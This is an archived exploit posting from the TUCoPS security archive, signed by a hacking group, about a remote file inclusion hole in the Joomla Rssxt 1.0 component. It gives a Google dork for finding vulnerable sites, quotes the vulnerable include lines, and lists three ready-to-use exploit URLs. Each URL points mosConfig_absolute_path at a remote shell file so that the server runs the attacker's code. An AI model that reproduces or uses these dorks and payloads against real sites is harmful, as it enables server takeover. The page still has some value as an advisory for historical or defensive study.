Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-4320.htm

Joomla Rssxt <= 1.0 Remote File Include Vulnerability



Joomla Rssxt <= 1.0 Remote File Include Vulnerability
Joomla Rssxt <= 1.0 Remote File Include Vulnerability



!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!=0D 
--------------------------------------------------------------------------------=0D
=0D
Title : Joomla Rssxt <= 1.0 Remote File Include Vulnerability=0D
=0D
--------------------------------------------------------------------------------=0D
#Author: Crackers_Child=0D
=0D
=0D
#cont@ct: crackers_child@sibersavascilar.com=0D 
=0D
--------------------------------------------------------------------------------=0D
=0D
Google Dorks  : allinurl:"/com_rssxt/"=0D
=0D
------------------------- -------------------------------------------------------=0D
=0D
Download : http://mamboxchange.com/frs/shownotes.php?release_id=985=0D 
=0D
--------------------------------------------------------------------------------=0D
Bug =0D
=0D
in pinger.php=0D
=0D
require("../../configuration.php");=0D
require("../../classes/mambo.php");=0D
require("../../includes/sef.php");=0D
require("$mosConfig_absolute_path/administrator/components/com_rssxt/class.rssxt.php");=0D
error_reporting(0);=0D
require("../../includes/IXR_Library.inc.php"); =0D
=0D
---=0D
=0D
in RPC.php=0D
=0D
require("../../configuration.php");=0D
require("$mosConfig_absolute_path/classes/mambo.php");=0D
require("$mosConfig_absolute_path/includes/sef.php");=0D
require("$mosConfig_absolute_path/administrator/components/com_rssxt/class.rssxt.php");=0D
require("includes/blogger.php");=0D
require("includes/metaweblog.php");=0D
error_reporting(0);=0D
require("$mosConfig_absolute_path/includes/IXR_Library.inc.php"); =0D
--=0D
=0D
rssxt.php =0D
=0D
include($mosConfig_absolute_path."/components/com_rssxt/includes/feedcreator.class.php");=0D
require_once( $mosConfig_absolute_path."/administrator/components/com_rssxt/class.rssxt.php"); =0D
=0D
--------------------------------------------------------------------------------=0D
=0D
Exploit:=0D
=0D
http://www.site.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt?=0D 
=0D
http://www.site.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt?=0D 
=0D
http://www.site.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt?=0D 
=0D
--------------------------------------------------------------------------------=0D
=0D
greets:=0D
=0D
All My Friends And SiberSavascilar.Com Members !=0D
=0D
--------------------------------------------------------------------------------=0D
=0D
=0D
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------=0D 
=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH